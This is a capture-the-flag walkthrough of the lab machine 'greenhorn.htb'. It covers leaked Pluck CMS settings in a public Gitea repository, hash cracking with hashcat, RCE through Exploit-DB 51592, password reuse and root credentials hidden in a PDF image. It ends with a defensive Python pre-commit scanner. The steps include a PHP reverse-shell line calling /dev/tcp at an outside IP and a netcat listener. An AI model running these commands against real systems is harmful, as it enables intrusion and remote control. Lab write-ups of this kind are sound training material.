The machine hosts a Gitea instance whose public repository exposes sensitive configuration files. Credentials recovered from the repository allow access to the Pluck CMS admin panel. A known Pluck 4.7.18 vulnerability provides RCE. Privilege escalation is achieved through a message hidden in an image embedded in a PDF.
Target: greenhorn.htb
Initial vector: Gitea repository leakage
Privilege escalation: hidden message → root SSH password
Web application:
http://greenhorn.htb:3000/
The site exposes a Gitea instance. While browsing, the site sets a cookie whose name identifies Gitea:
i_like_gitea=b996728efa716641
Browse public repositories:
http://greenhorn.htb:3000/explore/repos
Inside GreenAdmin/GreenHorn, several configuration files are accessible:
data/settings/token.php
data/settings/options.php
data/settings/pass.php
The admin password hash in pass.php is an unsalted SHA-512 digest (hashcat mode 1700).
Crack it:
$ hashcat -a 0 -m 1700 hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt
Result: iloveyou1
Login to Pluck CMS:
http://greenhorn.htb/login.php
user: admin@greenhorn.htb
pass: iloveyou1
Pluck version: 4.7.18
This version is vulnerable (Exploit-DB 51592).
Exploit reference:
https://www.exploit-db.com/exploits/51592
Prepare a PHP reverse shell:
& /dev/tcp/10.10.14.48/443 0>&1'"); ?>
Zip it:
$ zip -r miriabbas.zip miri.php
Start listener:
$ nc -nlvp 443
Run the exploit:
$ python3 51592.py
A shell is obtained.
Switch to the user junior, who reuses the admin password:
$ su junior
Password: iloveyou1
A PDF file on the system contains an embedded image. Extract the images and view the result:
$ pdfimages Using\ OpenVas.pdf pixeled
$ feh output.png
The image reveals a phrase:
sidefromsidetheothersidesidefromsidetheotherside
This is the root SSH password.
SSH as root:
$ ssh root@greenhorn.htb
Password: sidefromsidetheothersidesidefromsidetheotherside
Root access obtained.
The machine relies on Pluck configuration files committed to a public Gitea repository to leak the admin password hash. Pluck CMS 4.7.18 is then exploited for RCE, followed by password reuse to move to the junior user. A hidden message inside a PDF image provides the root password, completing the compromise.
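The root cause of the initial foothold is that Pluck's data/settings/ files ended up in a shared repository. As an added example (not part of this writeup or of Pluck/Gitea), the following Python pre-commit check flags exactly those files, plus any stray 128-hex SHA-512 digest copied elsewhere; the sample repository contents, the $ww variable name and the hash value are constructed.

```python
import re
from pathlib import Path

# Pluck CMS stores the admin password hash, API token and site options under
# data/settings/. These three file names are the ones that leaked from Gitea.
PLUCK_SETTINGS = {"pass.php", "token.php", "options.php"}

# Pluck 4.7.18 writes the admin password as an unsalted SHA-512 hex digest
# (128 hex chars); hashcat mode 1700 is raw SHA-512, which is why a wordlist
# attack on a leaked pass.php finishes almost instantly.
SHA512_HEX = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{128}(?![0-9a-fA-F])")


def scan_files(files):
    """files: mapping of repo-relative POSIX path -> text content.
    Returns a sorted list of (path, reason) for content that must not be
    committed to a shared or public repository."""
    findings = []
    for rel, text in files.items():
        name = rel.split("/")[-1]
        if name in PLUCK_SETTINGS and "data/settings" in rel:
            findings.append((rel, "pluck settings file"))
        elif SHA512_HEX.search(text):
            findings.append((rel, "unsalted sha512 digest"))
    return sorted(findings)


def scan_tree(root):
    """Disk variant: walk a checkout and feed every regular file to scan_files."""
    root = Path(root)
    files = {p.relative_to(root).as_posix(): p.read_text(errors="ignore")
             for p in root.rglob("*") if p.is_file()}
    return scan_files(files)


# Constructed sample checkout (not the real GreenHorn repository contents).
SAMPLE_REPO = {
    "index.php": "<?php include 'data/inc/header.php'; ?>",
    "data/settings/pass.php": "<?php\n$ww = '" + "0123456789abcdef" * 8 + "';\n?>",
    "data/settings/token.php": "<?php\n$token = 'constructed-token';\n?>",
    "data/settings/options.php": "<?php\n$site_title = 'GreenHorn';\n?>",
    "notes/backup.txt": "old admin hash: " + "fedcba9876543210" * 8,
    "README.md": "Pluck CMS site; settings live in data/settings/",
}

if __name__ == "__main__":
    for path, reason in scan_files(SAMPLE_REPO):
        print(f"BLOCK {path}: {reason}")
```

Wired into a pre-commit or CI hook, a non-empty result from scan_tree() should fail the push so the files never reach Gitea in the first place.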